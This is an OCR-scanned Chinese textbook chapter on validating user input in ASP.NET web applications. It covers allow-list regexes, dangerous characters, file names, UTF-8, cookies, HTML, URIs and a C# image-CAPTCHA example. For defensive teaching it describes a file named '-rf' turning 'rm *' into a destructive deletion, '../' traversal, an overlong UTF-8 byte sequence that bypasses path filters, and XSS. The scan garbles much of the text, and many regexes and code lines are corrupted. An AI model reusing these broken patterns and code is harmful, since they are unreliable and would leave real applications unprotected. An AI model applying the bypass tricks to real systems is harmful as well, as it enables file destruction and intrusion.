效 。 验 证 用 户 输入 的 目标 可 能 是 使 某 些 文本 字段 的 长 度 不 为 零 ， 或 字段 的 格式 设置 为 符合 
标准 类 型 的 格式 良好 的 数据 ， 还 有 可 能 使 字符 串 不 包含 任何 可 能 降低 系统 安全 性 的 危险 


字符 。 
本 章 讲述 如 何 利用 各 类 控制 输入 技术 检查 用 户 输入 的 信息 ， 按 照 预 定 的 规则 提供 系统 
的 处 理 。 





6.1 需要 验证 的 数据 


数据 验证 是 验证 用 户 标 识 真 实 性 的 过 程 ， 用 以 鉴别 用 户 身份 是 否 合法 。 用 ASPNET 
编写 Web 应 用 程序 时 ， 用户 保存 或 处 理 的 信息 需要 判断 其 有 效 性 和 安全 性 。 基 于 请 求 / 响 
应 模式 的 Web 应 用 程序 有 多 种 数据 验证 方式 。 

通常 ， 在 服务 器 端 可 以 直接 对 数据 进行 验证 ， 也 可 以 编写 客户 端 脚本 来 对 数据 实现 有 
效 性 验证 ， 在 数据 提交 给 服务 器 之 前 要 经 过 验证 。 在 实际 的 项 目 开发 中 ， 一 般 既 需要 客户 
端 验 证 ， 也 需要 服务 器 验证 。 

在 讲解 如 何 验证 用 户 输入 之 前 ， 需 要 详细 的 了 解 需要 关注 的 数据 和 信息 。 

1. 非法 输入 


目前 安全 程序 开发 人 员 的 一 个 最 大 的 误区 就 是 尝试 去 过 滤 “ 非 法 的 ”数据 值 。 这 样 做 
一 般 是 无 效 的 ， 因 为 攻击 者 通常 会 想 出 其 他 的 危险 的 数据 值 。 所 以 ， 开 发 人 员 应 该 做 的 是 
确定 哪些 数据 是 合法 的 ， 通 过 检查 数据 是 否 符合 定义 ， 拒 绝 所 有 不 符合 定义 的 数据 。 为 了 
安全 起 见 ， 在 开始 时 就 应 该 特别 谨慎 ， 只 允许 开发 人 员 使 用 合法 的 数据 。 毕竟， 如 果 限 制 
的 过 于 严格 ， 用 户 很 快 就 会 报告 说 程序 不 允许 合法 的 数据 进入 。 另 一 方面 ， 如 果 限 制 的 过 
于 宽松 ， 可 能 直到 程序 被 破坏 才 会 发 现 问题 。 

假设 开发 人 员 需 要 基于 用 户 的 某 个 输入 创建 文件 名 。 一 般 的 程序 员 都 知道 不 应 该 允许 
用 户 的 输入 中 包括 “/” 但 是 仅仅 去 检查 这 一 个 字符 可 能 是 远 远 不 够 的 。 例 如 ， 控 制 字符 
是 否 正确 ?空格 会 不 会 出 问题 ? 如 果 以 破 折 号 开头 呢 〈 在 不 好 的 代码 中 可 能 会 出 问题 )? 
特别 的 短语 会 不 会 出 错 等 。 在 绝 大 多 数 情 况 下 ， 只 要 创建 了 一 个 “非法 ”字符 的 列表 ， 攻 
击 者 就 可 以 找到 利用 程序 的 方法 。 

所 以 ， 开 发 人 员 必 须 检查 并 保证 输入 符合 安全 的 特定 模式 ， 而 拒绝 不 符合 这 个 模式 的 
所 有 输入 。 
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2. 数字 

数字 是 最 容易 读 的 一 类 信息 ， 如 果 开 发 人 员 期 望 输入 的 是 一 个 数字 ， 就 确认 数据 满足 
数字 格式 。 例 如 ， 针 对 阿拉 伯 数 字 来 说 ， 用 户 必 须 输入 至 少 一 位 阿拉 伯 数 字 ， 如 正则 表达 
式 : ^[0-9]+$ 就 可 以 做 到 这 点 。 在 大 多 数 情况 下 ， 数 字 会 有 一 个 最 小 值 和 一 个 最 大 值 。 如 
果 是 这 种 情况 ， 一 定 要 确认 数据 在 合法 的 范围 之 内 。 

不 要 根据 没有 减 号 这 一 条 件 就 认为 不 会 有 负数 。 在 很 多 数据 读 取 的 例子 中 ,如 果 读 到 一 
个 特别 大 的 数 ， 就 会 发 生 “ 溢 出 ”而 变 成 一 个 负数 。 实 际 上 ， 一 个 非常 聪明 的 针对 Sendmail 
的 攻击 正 是 基于 这 一 原理 。Sendmail 会 检查 “调试 标记 ”是 不 是 比 合法 的 值 大 ， 但 是 它 并 没 
有 检查 这 个 值 是 不 是 负数 。Sendamil 的 开发 者 想当然 地 认为 既然 他 们 不 允许 使 用 减 号 ， 就 不 
必 再 去 检查 输入 是 不 是 负数 了 。 问 题 是 ， 数 据 读 取 例 程 会 将 大 于 22 的 数 ， 如 4 294 967 269， 
转换 成 负数 。 攻 击 者 可 以 利用 这 一 点 来 覆盖 至 关 重 要 的 数据 ， 并 控制 Sendmail。 

如 果 需 要 读 取 浮 点 数 ， 还 有 另外 需要 关注 的 问题 。 许 多 设计 读 取 浮 点 数 的 例 程 可 能 允 
许 NaN〔 非 数字 ) 这 样 的 值 ， 这 样 会 给 接 下 来 的 处 理 例 程 带 来 问题 ， 因 为 任何 与 这 些 数据 
比较 的 结果 都 会 是 假 〈 而 且 ，NaN 与 NaN 也 不 相等 !)。 读 者 还 需要 知道 标准 IEEE 浮 点 数 
的 其 他 特殊 定义 ， 如 正 无 穷 大 和 负 无 穷 大 ， 负 零 (还 有 正 零 )。 所 有 应 用 程序 没有 考虑 到 的 
输入 数据 都 有 可 能 导致 以 后 被 黑客 利用 。 


3. 字符 串 


同样 ， 对 于 字符 串 ， 也 要 确定 哪些 是 合法 的 ， 并 拒绝 所 有 其 他 的 字符 串 。 通 常 验证 合 
法 字符 串 最 简单 的 方法 是 使 用 正则 表达 式 : 使 用 正则 表达 式 编写 描述 那些 合法 的 字符 串 模 
式 ， 抛 弃 不 符合 这 个 模式 的 数据 。 例 如 ，^[A-Za-z0-9]+$ 指定 字符 串 至 少 为 一 个 字符 长 ， 
而 且 只 能 包括 大 写字 母 、 小 写字 母 和 阿拉 伯 数 字 0 一 9 (任意 的 顺序 )。 更 多 的 ， 可 以 使 用 
正则 表达 式 来 详细 地 限制 所 允许 的 字符 串 (如 可 以 进一步 指定 第 一 个 字符 可 以 是 哪些 字 
母 )。 所 有 的 编程 语言 都 已 实现 了 正则 表达 式 的 库 : Perl 是 基于 正则 表达 式 的 ， 对 于 C， 函 
数 regcomp 和 regexec 是 基于 POSIX.2 标准 的 。 

如 果 使 用 正则 表达 式 , 一 定 要 明确 地 指出 要 匹配 数据 的 开始 (通常 用 ^ 标 识 ) 和 结束 ( 通 
常用 $ 来 标识 )。 如 果 忘 记 了 包括 ^ 或 $， 攻 击 者 就 可 以 在 他 们 的 攻击 中 嵌入 合法 的 文本 来 通 
过 检查 。 如 果 使 用 JSP 或 者 Perl 语言 ， 并 且 使 用 的 它 的 多 行 选项 (m)， 这 时 要 注意 : 必须 
使 用 \A 标识 开始 ， 用 \Z 标识 结束 ， 因 为 多 行 操作 改变 了 ^ 和 $ 的 含义 。 

通常 ， 开 发 人 员 应 该 尽 可 能 地 严格 ， 因 为 很 多 字符 都 会 带 来 特定 的 问题 ， 不 允许 在 程 
序 内 部 或 最 终 输 出 中 包含 有 特定 含义 的 字符 。 人 们 会 发 现 这 样 做 确实 很 困难 ， 因 为 在 一 些 
情况 下 有 太 多 的 字符 可 能 会 带 来 问题 。 

通过 大 量 对 于 攻击 事件 的 总 结 ， 笔 者 特别 总 结 了 经 常会 带 来 问题 的 字符 的 部 分 清单 

1) 常规 控制 字符 (字符 值 小 于 32) 

这 里 所 说 的 常规 控制 字符 指 的 是 字符 0， 传 统 上 称 做 NIL， 把 它 称 为 NIL 以 区 别 于 C 
语言 中 的 NULL 指针 。 在 C 语言 中 NIL 标记 了 一 个 字符 串 的 结束 。 即 便 没有 直接 使 用 C 
语言 ， 许 多 库 会 间接 地 去 调用 C 语言 的 例 程 ， 如 果 给 出 了 NIL， 就 有 可 能 出 错 。 另 外 ， 它 
可 以 被 解释 为 命令 结束 的 行 结 束 符 。 但 是 不 同 的 操作 系统 结束 编码 也 不 同 ， 基 于 UNIX 的 
系统 使 用 的 是 换行 字符 (0x0a)， 基 于 Windows 使 用 的 是 CP/M 的 回 车 换行 〈0x0d 0x0a)， 


= 
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Apple MacOS 系统 使 用 的 是 回 车 (0x0d)， 许 多 IBM 主机 (如 OS/390) 使 用 的 是 下 一 行 
(0x85)， 并 且 有 一 些 程序 甚至 〈 错 误 地 ) 使 用 反 CP/M 标记 (0x0a 0x0d)。 

2) ASCII 码 值 大 于 127 的 字符 

一 般 来 讲 ，ASCII 码 值 大 于 127 的 字符 都 是 国际 化 的 字符 ， 可 能 会 有 许多 含义 ， 所 以 
需要 确保 它们 被 正确 地 解释 。 通 常 这 些 都 是 UTF-8 编码 的 字符 ， 有 其 自身 的 复杂 性 ; 可 以 
参考 本 节 后 面 关于 UTF-8 的 讨论 。 

3) 元 字符 

元 字符 是 在 所 依赖 的 程序 或 库 中 ， 如 命令 shell 或 SQL 中 ， 有 特定 含义 的 字符 。 在 程 
序 中 有 很 多 特定 含义 的 字符 ， 如 用 于 定 界 的 字符 。 许 多 程序 将 数据 存放 在 文本 文件 中 ， 使 
用 逗号 、 制 表 符 或 冒号 隔 开 数 据 域 。 在 编码 中 应 拒绝 含有 这 些 值 的 数据 。 元 字符 中 经 常 出 
现 问题 的 是 小 于 号 (<)，XML 和 HTML 编程 中 都 用 到 了 它 ， 而 开发 人 员 在 编码 中 没有 足 
够 重视 。 

给 出 这 个 清单 的 目的 是 建议 读者 接受 尽 可 能 少 的 数据 ， 并 且 在 接受 另 一 个 字符 之 前 要 
慎重 考虑 。 接 受 的 字符 越 少 ， 给 攻击 者 制造 的 难度 就 越 大 。 


4. 文件 名 


如 果 数 据 是 一 个 文件 名 或 用 于 创建 一 个 文件 )， 应 该 对 其 进行 严格 限制 ， 最 好 不 要 
让 用 户 选择 文件 名 ， 如 果 不 得 不 那样 做 ， 可 以 把 字符 局 限于 形 如 
^[A-Za-z0-9][A-Za-z0-9.\-]*$ 的 较 小 模式 。 应 该 考虑 将 “/” 控制 字符 〈 尤 其 生成 新 行 的 ) 
和 前 导 符 “.”(UNIX/Linux 系统 中 的 隐藏 文件 ) 等 这 些 字符 从 合法 模式 中 去 掉 。 以 “-” 
为 前 导 也 不 是 好 的 习惯 ， 因 为 写 得 不 好 的 脚本 会 把 它们 解释 为 选项 。 

如 果 有 一 个 文件 名 为 “-rf”, 那么 在 UNIX/Linux 中 执行 命令 rm*, 将 会 变 成 执行 rm-rfx*。 
所 以 ， 将 “../” 从 模式 中 去 掉 也 是 一 个 好 主意 ， 使 攻击 者 无 法 “跳出 ”当前 目录 。 如 果 不 
允许 使 用 通配符 (使 用 字符 x、? 、] 和 人 选择 一 组 文件 )。 攻 击 者 可 以 通过 创建 稀奇 古怪 
的 通 配 模式 来 让 系统 不 知 如 何 处 理 而 关闭 。 

Windows 还 有 另外 一 个 问题 : 一些 文件 名 (忽略 扩展 名 和 字母 的 大 小 写 ) 总 是 被 认为 
是 物理 设备 。 例 如 ， 一 个 程序 在 任何 目录 中 试图 去 打开 COMI1 或 coml.txt， 将 被 系统 误解 
为 是 尝试 和 串口 通信 。 由 于 本 书 所 关心 的 是 类 UNIX 系统 ， 就 不 再 深入 地 探讨 该 问题 了 ， 
此 处 仅 作为 一 个 例子 ， 用 来 说 明 一 种 用 于 检查 合法 字符 情况 。 


5. 本 地 化 


在 当今 全 球 经 济 形势 下 ， 许 多 程序 都 允许 用 户 获得 本 地 化 显示 的 语言 和 其 他 语言 相关 
的 特定 信息 《如 数字 格式 和 字符 编码 )， 程 序 可 以 通过 用 户 提供 一 个 Locale 值 来 得 到 这 一 
信息 。 例 如 ， 本 地 化 参数 值 为 en_US.UTF-8， 说 明 本 地 化 参数 使 用 的 语言 是 英语 ， 使 用 美 
国 习 惯 ， 使 用 UTF-8 编码 。 

由 于 用 户 本 身 可 能 是 一 个 攻击 者 ， 我 们 需要 对 本 地 化 参数 值 进行 验证 。 建 议 确保 本 地 
化 参数 匹配 以 下 模式 : 


^[A-Za-z] [A-Za-z0-9 ,+@\-\.=]*$ 


如 何 来 创建 这 个 验证 模式 比 这 个 模式 本 身 更 有 价值 。 首 先 查 找 相关 的 标准 和 库 文档 来 














"Me 
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确定 一 个 正确 的 本 地 化 参数 的 描述 。 这 一 点 上 有 很 多 互相 抵触 的 标准 ， 所 以 必须 确保 最 终 
的 模式 可 以 接受 所 有 这 些 标准 定义 的 本 地 化 参数 。 

读者 会 发 现 只 需要 注意 以 上 列 出 的 字符 ， 限 定 这 个 字符 集 〈 尤 其 是 第 一 个 字符 ) 就 可 
以 避免 很 多 问题 。 然 后 ， 考 虑 常见 的 危险 字符 〈 如 作为 目录 分 隔 符 的 “/”， 用 于 “上 级 目 
录 ” 的 “..” 用 于 前 导 的 破 折 号 ， 或 空 的 本 地 化 参数 )， 并 确认 它们 被 过 滤 掉 。 


6. UTF-8 





国际 化 对 程序 还 有 另外 一 方面 的 影响 : 字符 编码 。 处 理 文本 时 需要 某 种 约定 将 字符 转 
换 为 计算 机 实际 可 以 处 理 的 数字 ， 这 些 约定 叫做 字符 编码 。 一 个 常见 的 字符 编码 方法 是 
UTF-8， 它 是 一 个 优秀 的 字符 编码 方法 ， 本 质 上 可 以 表示 任何 语言 的 任何 字符 。UTF-8 所 
以 特别 受 欢迎 是 因为 将 普通 的 ASCII 文本 作为 它 的 一 个 简单 子 集 。 结 果 是 ， 原 来 只 是 设计 
用 于 处 理 ASCII 的 程序 可 以 很 简单 地 升级 到 可 以 处 理 UTF-8。 在 一 些 情 况 下 ， 这 些 程序 根 
本 不 需要 修改 。 

但 是 ，UTF-8 也 有 它 不 足 的 一 面 。 有 一 些 UTF-8 字符 由 一 个 字 节 表示 ， 一 些 用 两 个 字 
节 表 示 , 还 有 一 些 用 三 个 字 节 表示 ， 甚 至 更 多 ,而 程序 被 假定 总 是 生成 最 短 的 可 能 的 表示 。 
这 样 ， 许 多 UTF-8 读 取 器 会 接收 到 “过 长 ”的 序列 ， 如 某 些 三 个 字 节 的 序列 可 能 被 解释 成 
由 两 个 字 节 表示 的 字符 。 

攻击 者 可 以 利用 这 一 点 来 “ 骗 过 ”数据 验证 攻击 程序 。Web 系统 设计 的 过 滤器 一 般 不 
允许 十 六 进 制 的 2F 2E 2E 2F (“/./”, 但 如 果 它 允许 UTF-8 的 十 六 进 制 值 2F C0 AE 2E 2F， 
程序 也 可 能 会 把 它 解释 为 “/./”。 所 以 ， 如 果 要 接收 UTF-8 文本 ， 务 必要 确认 每 一 个 字符 
都 使 用 最 短 可 能 的 UTF-8 编码 。 


7， 电子 邮件 地 址 


许多 程序 中 都 会 接收 电子 邮件 地 址 ， 处 理 所 有 可 能 的 合法 电子 邮件 地 址 (如 RFC 2882 
和 822 所 指定 的 ) 非常 的 困难 。 用 于 检查 电子 邮件 地 址 的 “ 短 ” 正 则 表达 式 就 有 4 724 个 
字符 长 ， 即 使 是 这 样 还 是 没有 包括 所 有 的 情况 。 不 过 大 多 数 的 程序 是 非常 严格 的 ， 只 接收 
一 个 特别 受 限 子 集 的 电子 邮件 以 正常 地 工作 。 

在 大 多 数 情况 下 ， 只 要 程序 可 以 接收 正常 的 name@domain 格式 的 因特网 地 址 (如 
john.doe@somewhere.com)， 拒 绝 诸如 John Doe<john.doe@somewhere.com> 这 个 在 技术 上 
看 似 合法 的 地 址 就 没 问题 了 。 


8. Cookie 




















网 络 应 用 程序 经 常 为 重要 的 数据 使 用 Cookie。 需 要 注意 的 是 ， 用 户 可 以 任意 地 重新 设 
置 Cookie 的 值 和 形式 。 不 过 这 里 有 一 个 重要 的 验证 窍门 : 接收 一 个 Cookie 值 之 前 一 定 要 
检查 它 的 域 值 是 不 是 你 所 期 望 的 (如 一 个 站 点 )。 否则 , 一 个 相关 的 站 点 (可 能 已 经 被 击 垮 ) 
就 可 能 被 插入 到 用 于 欺骗 的 Cookie 中 。 

9. HTML 

有 了 时候 Web 程序 要 从 一 个 看 起 来 信任 的 用 户 处 得 到 数据 并 把 它 传 给 其 他 的 用 户 。 如果 
第 三 个 用 户 的 程序 有 可 能 被 这 些 数 据 破坏 掉 ， 那 么 我 们 有 责任 保护 它 。 使 用 看 起 来 可 信任 


-3 


无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 


的 中 间 媒 介 传 输 恶 意 数据 的 攻击 被 称 为 “交叉 站 点 恶意 内 容 ” 攻 击 。 

这 个 问题 对 于 网 络 应 用 来 说 是 一 个 难题 ， 如 那些 允许 用 户 添加 当场 连续 评述 的 社区 
“黑板 ”。 在 这 种 情况 下 ,攻击 者 可 以 尝试 添加 包含 恶意 代码 脚本 、 图 片 标签 的 HTML 格式 
的 评述 。 其 目的 是 让 用 户 的 浏览 器 运行 在 察看 本 文 的 时 候 去 执行 那些 恶意 代码 。 由 于 攻击 
者 通常 是 试图 添加 恶意 脚本 ， 因 此 这 种 攻击 被 称 为 “交叉 站 点 脚本 攻击 ”(XSS 攻击 )。 

通常 ,避免 这 种 攻击 的 最 好 的 办 法 是 验证 所 接收 的 HTML 没有 包括 这 种 恶意 脚本 。 同 
样 要 做 的 是 把 大 家 所 知道 的 安全 的 中 间 媒 介 列 出 来 ， 然 后 禁止 其 他 。 

为 了 方便 读者 ， 笔 者 特别 列 出 在 HIML 中 可 以 接收 的 字符 以 及 它们 的 结束 标签 : 

<p> (段落 ) 

<b> (加 粗 ) 

<i> (斜体 字 ) 

<em> (强调 ) 

<strong> (特别 强调 ) 

<pre> (预定 义 文本 ) 

<br> (强制 断 行 -- 注意 它 不 需要 关闭 标签 ) 

请 大 家 牢记 ，HTML 标签 是 不 区 分 大 小 写 的 。 除 非 检 查 了 属性 的 类 型 和 属性 值 ， 和 否则 
不 要 接收 任何 属性 ， 像 很 多 支持 JavaScript 等 的 属性 可 能 会 给 用 户 带 来 麻烦 。 

另外 ， 开 发 人 员 可 以 扩展 这 个 集合 ， 但 是 要 特别 注意 的 是 ， 任 何 让 用 户 立 即 加 载 另 一 
个 文件 的 标签 ， 比 如 Image 标签 ， 都 是 安全 漏洞 ， 可 能 会 导致 XSS 攻击 。 

另外 一 个 问题 是 ， 需 要 确认 攻击 者 无 法 任意 打 乱 文件 的 其 余部 分 ， 特 别 是 要 确保 任何 
评述 或 者 片段 看 起 来 不 能 像 正式 的 内 容 。 其 中 一 个 方法 是 保证 任何 XML 或 HTML 命令 完 
全 对 称 〈 任 何 打 开 的 都 要 关闭 )。 

这 在 XML 术语 中 被 称 为 “格式 良好 的 ”数据 。 如 果 正 在 接收 标准 HTML， 可 能 不 需 
要 为 段落 标记 〈<p>) 检测 安全 ， 因 为 它们 不 是 对 称 的 。 

许多 情况 下 开发 人 员 要 接收 <a>( 超 链接 )， 还 可 能 需要 接收 属性 href。 如 果 必 须 这 样 
做 的 话 ， 开 发 人 员 必 须 验证 链接 到 的 URLURL。 


10. URIURL 





超 文本 链接 可 以 是 任何 “统一 资源 定位 地 址 (统一 资源 定位 符 URL, Uniform Resource 
Locator，URI)， 不 过 现在 大 多 数 人 只 知道 一 种 特定 的 URI， 那 就 是 “统一 资源 定位 地 址 ”。 
许多 用 户 盲目 点 击 ， 指 向 一 个 URI 的 超 链接 ， 并 自然 地 认为 不 会 因为 显示 而 带 来 麻烦 ， 而 
作为 一 个 开发 者 的 任务 就 是 确保 用 户 的 期 望 不 会 落空 。 

尽管 URI 提供 了 很 大 的 灵活 性 , 但 如 果 这 个 URI 可 能 来 自 于 攻击 者 , 就 需要 在 把 它 转 
给 任何 其 他 人 之 前 进行 检查 。 攻 击 者 可 以 在 URI 中 加 入 很 多 东西 来 迷惑 用 户 ， 例 如 攻击 者 
可 以 引入 一 些 查询 ， 而 导致 用 户 去 做 不 愿 去 做 的 事情 ， 并 且 他 们 也 可 以 让 用 户 误 以 为 是 要 
浏览 另 一 个 网 站 而 不 是 他 们 现在 所 在 的 。 一 般 来 讲 ， 我 们 很 难 给 出 一 个 适用 于 所 有 情况 的 
单一 模式 。 不 过 一 个 可 以 防止 大 多 数 攻击 ， 同 时 可 以 允许 大 多 数 有 用 的 链接 通过 的 〈 对 于 
公共 的 网 站 而 言 ) 最 安全 的 模式 是 : 

(httplftplhttps):// [-A-2a-z0-9. /]+$ 


一 个 更 为 复杂 的 模式 是 : 








。104 。 
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(http1ftp1https) ://[-RA-Za-z0-9-_ ]+(\/([R-Za-z0-9\-\ \.\I\~\*\'\(\)\S\?]+ 
DA 


11. 数据 文件 


复杂 的 数据 文件 和 数据 结构 通常 由 众多 的 小 组 件 构成 。 需 要 把 这 个 文件 或 者 结构 分 
解 ， 并 检查 每 一 部 分 。 如 果 这 些 组 件 之 间 有 特定 的 依赖 关系 ， 就 一 并 检查 。 它 对 于 可 靠 性 
确实 有 好 处 。 


6.2 ” 几 种 常见 验证 方案 





日 常 Web 开发 中 有 常用 的 几 种 数据 验证 技术 : 图 片 和 附加 码 的 数据 验证 、Web 表单 数 
据 验 证 、Web 窗 体 数据 验证 、 验 证 控件 数据 验证 、 客 户 端 脚本 数据 验证 、 正 则 表达 式 数 据 
验证 。 











6.2.1 图 片 和 附加 码 数据 验证 


目前 实现 图 片 验证 码 时 有 两 种 方式 : 

(1) 通过 动态 数据 网 页 中 的 各 种 脚本 实现 。 

(2) 用 支持 动态 数据 网 页 的 第 三 方 组 件 实现 。 

在 ASPNET 中 编写 基本 的 脚本 ,赋予 其 必要 的 属性 ， 如 生成 码 颜色 ， 码 位 数 ， 码 尺寸 
等 ， 就 可 以 灵活 地 生成 一 组 验证 码 。 验 证 码 图 片 一 般 放 在 用 户 名 和 用 户 密码 之 后 ， 也 可 以 
根据 需要 放置 。 

附加 码 通常 由 服务 器 随机 产生 ， 一 般 是 由 数字 和 字母 组 成 的 一 串 字符 ， 显 示 在 登录 页 
面 中 ， 用 户 登 录 时 必须 将 附加 码 一 并 输入 提交 ， 服 务 器 对 提交 的 验证 码 同时 进行 验证 。 

为 了 让 读者 直观 了 解 如 何 为 Web 系统 添加 图 片 验证 功能 , 这 里 特 举 出 一 个 实例 说 明 如 
何在 ASPNET 页 创建 图 片 验 证 。 

首先 创建 一 个 名 称 为 RndImage.aspx 的 图 片 验 证 码 页 ， 页 面 使 用 的 函数 分 别 是 ， 得 到 
随机 长 度 为 len 的 字符 串 函 数 getRandomValidate(int len)， 在 图 片 中 画 底线 函数 
drawLine(Graphics gfc,Bitmap img)， 在 图 片 中 画 杂 点 函数 drawPoint(Bitmap img)， 使 用 
getRandomValidate 函数 返回 的 字符 串 生 成 图 片 的 函数 getImageValidate(string strValue)。 

其 具体 实现 代码 如 下 : 


using System.Drawing; 
using System.IO7 
public partial class createImg : System.Web.UI.Page 
{ 
Random ran = new Random(); 
protected void Page Load(object sender, EventArgs e) 
{ 
string str = getRandomValidate (4); 
// 这 一 步 是 为 了 将 验证 码 写 入 Session, 进行 验证 ,不 能 缺 省 ,也 可 以 使 用 Cookie 
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Session["check"] = str; 
getImageValidate (str); 


// 得 到 随机 字符 串 , 长 度 自己 定义 
private string getRandomValidate (int len) 


{ 
int num; 
int tem; 
String rEudStr = "> 
Eor ‘(int 3 = 07 < lonr zt) 
{ 
num = ran.Next (); 
/* 
* 这 里 可 以 选择 生成 字符 和 数字 组 合 的 验证 码 
*/ 
tem = num % 10 + '0'; // 生成 数字 
// tem = numgs26+ 'A'; // 生成 字符 
rtustr += Convert.ToChar (tem) .ToString(); 
} 
return rtustr; 
} 
// 生成 图 像 


private void getImageValidate (string strValue) 


{ 


} 
{ 


// string str = "0000"; // 前 两 个 为 字母 0, 后 两 个 为 数字 0 

int width = Convert.ToInt32 (strValue.Length * 12); // 计算 图 像 宽度 
Bitmap img = new Bitmap (width，23) 7 

Graphics gfc = Graphics .FromImage (img) ; // 产生 Graphics 对 象 , 进行 
gfc.Clear (Color.White) 

drawLine (gfc, img); 

// 写 验证 码 , 需要 定义 Font 

Font font = new Font("arial", 12, FontStyle.Bold); 
System.Drawing.Drawing2D.LinearGradientBrush brush =new System. 
Drawing.Drawing2D.LinearGradientBrush (new Rectangle(0, 0, img. 
Width, img.Height), Color.DarkOrchid,Color.Blue, 1.5f, true); 
gfc.DrawString (strValue, font, brush, 3, 2); 

drawPoint (img); 

gfc.DrawRectangle (new Pen(Color.DarkBlue), 0, 0, img.Wwidth - 1, 
img.Height - 1); 

// 将 图 像 添 加 到 页 面 

MemoryStream ms = new MemoryStream() 7 

img.Save (ms, System.Drawing.Imaging.ImageFormat.Gif); 

// 更 改 Http 头 


Response.ClearContent () ; 


Response.ContentType = "image/gif"; 
Response.BinaryWrite (ms.ToArray ()); 
// Dispose 


gfc.Dispose(); 
img.Dispose(); 
Response.End(); 


private void drawLine (Graphics gfc,Bitmap img) 


// 选择 画 10 条 线 ,也 可 以 增加 , 也 可 以 不 要 线 , 只 要 随机 杂 点 即 可 
生机 下 二 机 让 一作 站 过于 下 可 让) 
{ 

int xX1 = ran.Next (img.Width); 
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int yl = ran.Next (img-Height) 7 
int x2 = ran.Next (img.Width); 
int y2 = ran.Next (img.Height); 
// 注意 画笔 一 定 要 浅 颜 色 ; 否则 验证 码 看 不 清楚 
gfc.DrawLine (new Pen(Color.Silver), xl1, yl, x2, y2); 
} 
} 
private void drawPoint (Bitmap img) 
{ 
/#* 
// 选择 画 100 个 点 ,可 以 根据 实际 情况 改变 
for {int 1 三 07 1 < 1007 i++) 
{ 
int x = ran.Next (img.Width); 
int y = ran.Next (img.Height); 
img .SetPixel (x,y, Color.FromArgb (ran.Next () ) ) ; // 杂 点 颜色 随机 
} 
*/ 
int col = ran.Next();// 在 一 次 的 图 片 中 杂 店 颜色 相同 
for (int i = 0; i < 100; i++) 
{ 
NE ran.Next (img .Width); 
int y = ran.Next (img.Height); 
img.SetPixel (x, y, Color.FromArgb(col)); 


} 

下 面 演示 如 何 利用 该 图 像 生 成 页 构成 验证 系统 的 一 部 分 ， 为 了 观看 效果 ， 需 要 创建 一 
个 名 称 为 Test.aspx 的 页 面 。 

页 面 上 需要 一 个 文本 框 、image 控件 和 一 个 Button 控件 。 需 要 注意 的 是 ， 将 image 控 
件 的 imageUrl 指定 为 图 像 生成 页 RndImage.aspx， 如 下 代码 所 示 : 

<asp:Image ID="Imagel" runat="server" ImageUrl="~/RndImage.aspx" /> 

测试 只 需要 用 户 在 文本 框 输入 图 片 显示 的 数字 ， 然 后 就 可 以 进行 图 片 和 输入 的 对 比 验 
证 了 。 像 平时 使 用 Session 一 样 ，RndImage.aspx 页 面 中 有 一 个 Session["check"]。 当 两 个 会 
话 的 值 一 致 ， 则 说 明 验 证 通过 。 

Test.aspx 页 的 演示 验证 代码 如 下 : 


protected void Page Load (object sender, EventArgs e) 


{ 
if (Session["check"] == null) 
message.Text = "对 不 起 , 图片 错 误 !"; 
1 
protected void checkButton Click(object sender, EventArgs e) 
{ 
if (check.Text.ToString() == Session["check"] .ToString()) 
message.Text = "验证 通过 "; 
else 
message .Text = "请 重 来 "; 
1 


图 片 验证 运行 效果 如 图 6-1 所 示 。 
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图 6-1 图 片 验 证 


6.2.2 Web 表单 数据 验证 





在 ASPNET 中 ， 指 定 runat=“server” 的 表单 称 为 Web 表单 ，Web 表单 本 身 是 基于 服 
务 器 的 , 是 ASPNET 用 来 为 应 用 程序 提供 大 部 分 功能 框架 的 一 部 分 。 服 务 器 对 界面 的 情况 
一 清二 楚 ， 即 用 户 元 素 只 能 在 服务 器 上 创建 。 

当 用 户 输入 数据 提交 表单 时 , 服务 器 将 通过 另外 的 页 面 来 验证 Web 表单 中 所 输入 数据 
是 否 有 效 。 表 单 在 实现 验证 方面 具有 灵活 性 和 易于 实现 性 ， 其 数据 验证 功能 强大 ， 开 发 人 
员 既 可 以 把 用 户 信息 放 在 web.config 文件 中 , 也 可 以 将 用 户 的 验证 信息 放 在 数据 库 或 XML 
文件 中 ， 通 过 创建 自己 定义 的 程序 验证 数据 。 


6.2.3 ”Web 窗 体 数据 验证 


ASPNET 框架 提供 了 一 种 新 型 的 数据 验证 ， 使 用 Web 服务 器 控件 来 实现 数据 的 验证 ， 
称 为 Web 窗 体 数据 验证 技术 。 因 此 ， 专 门 用 于 Web 数据 验证 的 Web 服务 器 控件 也 称 为 
Web 数据 验证 控件 。ASPNET 中 包含 6 种 数据 验证 控件 。 

输入 验证 控件 就 是 验证 用 户 输入 内 容 正确 性 的 控件 ， 如 用 户 在 文本 框 中 输入 数字 后 ， 
便 会 显示 一 条 信息 表明 用 户 输入 了 不 合乎 要 求 的 数据 。 验 证 过 程 即 可 以 在 服务 器 上 进行 ， 
也 可 以 在 客户 端的 浏览 器 里 执行 , 在 浏览 器 里 执行 有 利于 提高 服务 器 性 能 。 从 ASPNET 2.0 
就 开始 提供 了 必要 的 数据 验证 控件 ， 包 括 输入 验证 控件 (RequiredFieldValidator)、 比 较 验 
证 控件 (CompareValidator)、 范围 验证 控件 (RangeValidator)、 正则 表达 式 验证 控件 (Regular 
ExpressionValidator )、 可 定制 验证 控件 (CustomValidator〉 和 综合 验证 控件 (Validation 
Summary)。 这 6 个 验证 控件 使 开发 人 员 能 在 客户 端 和 服务 器 端 进行 更 为 智能 的 验证 。 

下 面 将 分 别 介绍 这 6 个 重要 的 输入 验证 控件 。 

1. RequireFieldValidator 验证 控件 


RequireFieldValidator 验证 控件 可 以 用 来 强迫 某 个 Web 控件 输入 数据 , 其 使 用 语法 为 : 
<ASP:RequireFieldValidator Id=" 控 件 对 象 名 " 


Runat="Server™" 


ControlToValidate=" 要 验证 的 控件 名 称 " 
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ErrorMessage=" 所 要 显示 的 错误 信息 " 
Text=" 未 输入 数据 时 所 显示 的 信息 " 
> 


ControlToValidate 属性 用 来 指明 要 检验 的 控件 ， 而 ErrorMessage 属性 用 来 提供 给 其 他 
控件 显示 相关 信息 ，Text 属性 在 使 用 者 的 输入 没有 通过 验证 时 立即 显示 。 

为 演示 功能 , 举 一 个 例子 : 开发 人 员 可 以 通过 下 面 的 程序 限制 姓名 字段 一 定 要 有 输入 ; 
否则 无 法 触发 按钮 的 事件 程序 ， 其 HTML 代码 如 下 : 


<Htm1> 
<Form Id="Forml" Runat="Server"> 
姓 名 :<ASP:TextBox Id="txtName" Runat="Server"/> 
